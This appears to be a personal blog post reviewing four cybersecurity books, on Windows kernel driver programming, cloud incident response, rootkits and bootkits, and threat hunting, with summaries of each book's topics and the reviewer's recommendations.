Windows Kernel Programming — Pavel Yosifovic
I started the year reading this book. I always wanted to learn more about how the Windows Kernel works and nothing better to understand like learning how to develop a Windows Driver, which is loaded in the kernel.
The book starts with an overview of Windows Internals before starts to explain how to prepare the environment and how to develop your first driver (like a ‘Hello world’ driver) and how to load it.
After learn how to write your first lines of code of a Kernel Driver, the book explains the differences between user mode and kernel mode develop, for example, if you make some mistake not just the driver will be affected but the entire system. One of the most important topics related to this is how to debug the kernel, and the book explains how to use two machines to debug it, since if you use just one machine a breakpoint would freeze the entire system.
Among other topics explained, at the end of the book you will able to develop a Sysmon-like tool, which would be very useful to understand, for example, how to an EDR works. This book is highly recommended for those who wants to understand more about the kernel mode, even for monitoring as to exploitation.
Incident Response in the Age of Cloud — Erdal Ozkaya
I have a lot of interest in the Incident Response (IR) field and when I heard about this book for the first time I put it immediately in my wishlist, in special because I read ‘Cybersecurity — Attack and Defense Strategies’, a book which Erdal wrotes together with Yuri Diogenes and it’s one of the best books related to cybersecurity that I ever read. So, I couldn’t expect less to this book.
The book starts with an introduction to IR and sice it was written this year, it shows an interesting point of view of the implications of the COVID-19 to the cybersecurity field and how it can increase the chance of an incident to happen.
It covers all the IR process independently if it’s in the cloud or not, but, believe me, the content is very interesting and it worths to read even if you already know about the process and is reading the book most because of the content about cloud. Even so, during the some topics have some mention to the IR in the cloud and even one part which covers a hands-on IR in a phishing scenario. After that, there’s a chapter specific to IR in the cloud, which the MITRE Cloud matrix is used to explain some cloud-related attacks.
As mentioned before, it worths to read even the parts not related to cloud. In the last chapter of the book have some text of other professional who works with IR for many years, each one covers a different topic. This last chapter reinforces the idea that it’s a very interesting book to read.
Rootkits & Bootkits — Alex Matrosov & Eugene Rodionov
I heard about this book some time ago but I always think if I would be ready to read about this topic. Fortunatelly, I read ‘Windows Kernel Programming’ first and I can easily say that it was determinant to understand this book, since a knowledge about how the Windows Kernel works is required to understand the rootkits (and the bootkits).
The book starts talking about rootkits, more specificly, with case studies. After that it talks about bootkits, which is discussed in most part of the book, and explains the motivations to develop bootkits instead of rootkits, and one of the reasons is explained in ‘Windows Kernel Programming’, which is that in x64 systems you have to enable debug mode to load kernel drivers wich are not signed and to enable it a system restart is required.
During the bootkit part you read many about the boot process, MBR and VBR, and how to infect them. After these explanations and talk about some bootkits already developed, there are two important chapters: one about how to perform a static analysis of a bootkit using IDA Pro and other about emulation and virtualization to perform dynamic analysis.
Personally, for me, it was great to learn more about MBR since I’ve already studied it when I was learning Forensics. And talking about Forensics, the last part of the book is about how to investigate possible bootkit infections, including a explanation about how to to extract data from firmware and how to analyze it.
Since there are MANY technical details in this book, is hard to talk briefly about it, so you will learn, for sure, many interesting topics which are important to know about and are not well discussed. As mentioned in the introduction of the book: “We came up with the idea for this book when, having published a series of articles
and blog posts about rootkits and bootkits, we realized the topic wasn’t getting nearly as much attention as it deserved”
Practical Threat Intelligence and Data-driven Threat Hunting — Valentina Costa-Gazcón
With a knowledge about IR and details about how the operation system works (Windows, in special) is important to performing Threat Hunting, since you will look for something which is not generating an alert for the SOC or something which can indicates of a possible compromise.
But believe me, a previous knowledge about these topics are not necessary to read this book, since it’s very well explained, which includes a detailed explanation about how to build you lab environment to conduct Threat Hunting. It’s a really “from scratch” tutorial about how to configure a Windows Server and all its necessary components, and a ELK host to search for the data.
It’s also explain how to run adversary emulation to generate data to be searched in ELK (but also reminding that in a real environment you will have noise). When it talks about the adverary emulation with Atomic Red Team, it wants to make sure that you understand how the emulation of some techniques of each tactic of MITRE matrix works.
Reading the book you will notice too that it cares that you document your results and make an assessment to ensure that they have good quality, even shows a framework to start because it’s easy to show results and the value of them to the C-level. The book also mentions the projects related to a methodology made by Roberto and José Rodriguez, which are part of Open Threat Research (OTR) community and it’s certain interesting to take a look.
You will find many, many information in this book and, as I mentioned before, the entire book is very well explained. Threat Hunting is commonly see as something to be conducted for someone with many years of experience, but with this book you will learn about what you need to conduct this activity. Due to the format of the content, a previous experience is not required to read it, the requirement is just the desire to learn about this topic.